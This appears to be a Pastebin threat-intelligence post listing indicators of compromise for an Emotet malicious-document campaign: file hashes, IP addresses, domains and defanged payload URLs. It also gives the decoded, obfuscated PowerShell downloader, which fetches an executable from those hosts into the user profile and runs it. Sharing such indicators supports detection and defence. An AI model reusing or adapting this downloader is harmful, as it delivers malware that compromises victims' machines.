Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #Emotet #Docs #malware #OSINT #IOC
- MD5:
- 129a4380ebaff7cfc82bfe05e7d282ff
- 12e0a75281b8bfa694efcbbaa044dfe5
- 5c6850ddd3f2978531f644c0a65e9b68
- 60dfa0e248a230e299cad15481b069c9
- IPs:
- 148.251.15.218
- 195.210.46.99
- 5.101.181.123
- 51.79.97.67
- 89.187.86.233
- Domains:
- comvcdigital.com.br
- cryptomat.blog
- diverzeent.com
- lara-service.com
- samuelselectrical.co.uk
- URLs:
- hxxps://www.microsoft.com/ #> $Tkxzhfvcs=
- hxxps://diverzeent.com/bkup/7f/
- hxxps://comvcdigital.com.br/jkcaztm/tsun/
- hxxps://lara-service.com/wp-admin/74d/
- hxxps://samuelselectrical.co.uk/wp-includes/ymt76/
- hxxps://cryptomat.blog/0z7f3/JSaGNG/
- Decoded Base64 Powershell:
- <# hxxps://www.microsoft.com/ #> $Tkxzhfvcs='Mvdnqvvrybmgv';
- $Knimfgkkhech = '879';
- $Gorzmcrq='Rbpzhuomsk';
- $Tkykfjrj=$env:userprofile+'\'+$Knimfgkkhech+'.exe';
- $Qjgpjfgdccgep='Tnjemsed';
- $Qhtzttzfb=.('new'+'-o'+'bjec'+'t') NeT.wEbcLieNt;
- $Lyowtwunszm='hxxps://diverzeent.com/bkup/7f/
- hxxps://comvcdigital.com.br/jkcaztm/tsun/
- hxxps://lara-service.com/wp-admin/74d/
- hxxps://samuelselectrical.co.uk/wp-includes/ymt76/
- hxxps://cryptomat.blog/0z7f3/JSaGNG/'."sPL`IT"('
- ');
- $Yussieqt='Itxtlkripulkt';
- foreach($Slzphbhmqv in $Lyowtwunszm){try{$Qhtzttzfb."D`OwnloA`DFiLE"($Slzphbhmqv, $Tkykfjrj);
- $Zjguelfmmkln='Yqkgqtaqpsca';
- If ((&('Ge'+'t-Ite'+'m') $Tkykfjrj)."lEN`GtH" -ge 36997) {[Diagnostics.Process]::"STA`Rt"($Tkykfjrj);
- $Roazxiujzemcg='Zwgorebdcz';
- break;
- $Tnseprnvvk='Ldglbequfgs'}}catch{}}$Hxupkyaczbvg='Ltonojrdnypcy'
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
